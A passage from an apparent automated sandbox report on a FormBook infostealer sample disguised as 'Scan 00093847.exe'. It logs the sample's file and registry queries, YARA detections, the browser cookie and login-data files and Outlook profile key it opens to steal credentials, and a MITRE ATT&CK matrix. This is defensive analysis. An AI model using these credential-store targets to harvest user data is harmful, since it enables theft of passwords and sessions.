            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\OFFSYM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Scan 00093847.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\setupugc.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\setupugc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Scan 00093847.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000003.00000002.2069489758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3553617702.0000000003780000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2070910254.00000000013F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000B.00000002.3555734438.0000000004F50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071077232.0000000002950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552629363.0000000003500000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.3552335320.0000000003250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.3553601976.0000000003FF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
            DLL Side-Loading            		412
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		121
            Security Software Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		11
            Disable or Modify Tools            		LSASS Memory2
            Process Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager41
            Virtualization/Sandbox Evasion            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
            Process Injection            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets2
            File and Directory Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials113
            System Information Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            Timestomp            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
            IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
            DLL Side-Loading            		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
